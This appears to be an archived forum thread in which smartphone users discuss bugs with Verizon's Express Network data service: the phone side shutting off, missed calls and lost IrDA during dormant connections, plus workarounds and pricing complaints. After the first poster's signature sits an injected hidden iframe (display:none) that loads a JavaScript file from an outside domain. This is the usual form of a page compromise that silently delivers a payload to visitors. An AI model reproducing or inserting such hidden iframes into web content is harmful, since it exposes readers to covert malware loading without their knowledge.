+ Reply to Thread

Software glitches -- Express Neywork...

Folks,

For reference, I am using SZ 1.0.13 / MZ1.0.27 on Verizon.

After using express network from a PC or the PDA the phone side occasionally shuts off (this must be a bug). I don’t notice it, but I am missing calls. When I try and reconnect it doesn’t work. Then I go to the phone app, and the phone is off!! This has happened to me at least 4 times.

1) Try this…
    - Go into the data fax application
    - connect with your PC
    - allow the connection to go dormant
    - Now most keys warn you that if you leave the application, the connection will get terminated, however...
    - Hit the hangup key
    - It says "Packed Data High Data Rate"
    - Soon the connection goes dormant the the phone re-dials PPP
    - Hit hangup key -- menu will go screwey, or the phone side might shut off.

2) Another one:

- Get a PDA connection to Express Network
    - Go into the data fax application
    - At this point the phone is confused because your laptop can’t connect.
    - Again the phone side might shut off.

Maybe Alltel released the phone because they are not supporting high speed data yet?

The good news is that you can work around these issues pretty easily, but they would confuse anyone. It seems like the phone doesn’t generally know how to handle the dormant mode of high speed data correctly.

3) Another one: call your phone when a high speed connection is dormant. Sometimes you can call the phone, sometimes it goes right to voicemail. It’s not consistent.

4) Finally: when you have a dormant connection via the PDA, the phone is confused. You can't access the connection from the PDA, yet the connection is still active/dormant. You can disconnect, but when you try and re-connect, the phone side will be off. It asks you if you want to turn on the phone -- try and turn on the phone and you will need a soft reset.

Good news is that I have had no hard resets.

Glenn<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Glad to see power users like you paving the way Glenn. Too bad you weren't a beta tester. Personally I've decided that even a $100 rebate and 1 free month isn't enough of an inducement for me to sign up for Express Network until Verizon lowers it prices.
    The good news is that a customer service guy at Verizon told me that lower prices are coming this Spring. By then I hope there will be a software revision to address the issues you've spotted.

Jazzman,

The $99 is a joke -- I can't see anyone staying on this. Depending on your needs, the Express Network plans that include voice, data, and are no-roaming like the old Single-rate might be pretty good. I travel allot, so I'll probably switch to one of these.

BTW, Express Network works fine as long as you don't switch in and out of the Phone and FaxModem applications when a connection is active.

Glenn

Originally posted by glenn_butler
    Folks,

<<<<<< edited for clarification >>>>>>>>

4) Finally: when you have a dormant connection via the PDA, the phone is confused. You can't access the connection from the PDA, yet the connection is still active/dormant.

Glenn
    I've noticed that if you have a "dormant connection" running...
    (see the icon in the red circle?)

You lose ALL IRDA cababilities, unless you shut the phone off then turn it back on. Grrrrr!

Is there a way to close the dormant connection, w/o turning the phone off?
    <bugle>

Originally posted by aka.bugle
    Is there a way to close the dormant connection, w/o turning the phone off?
    <bugle>
    Yes, just hit the end call button on the phone. Do it just once and it should end the session without turning off the phone. At least that works for me.

Humm, I will play with mine a little more but I don't seem to have ANY of these problems so far stated. In regards to the IRDA, well the only time I use it is when I'm OFF the network (not even dormant mode) and it works just fine. In regards to phone shutting off, not getting calls, not being able to hang up, Etc... I have yet to experience any of these and I use the Express network quite often, both on PDA and my Apple PB G4. By the way, I have the same software versions.

Originally posted by aka.bugle
    I've noticed that if you have a "dormant connection" running... You lose ALL IRDA cababilities, unless you shut the phone off then turn it back on. Grrrrr! Is there a way to close the dormant connection, w/o turning the phone off?
    <bugle>
    http://www.smartphonesource.com/vbul...4709#post54709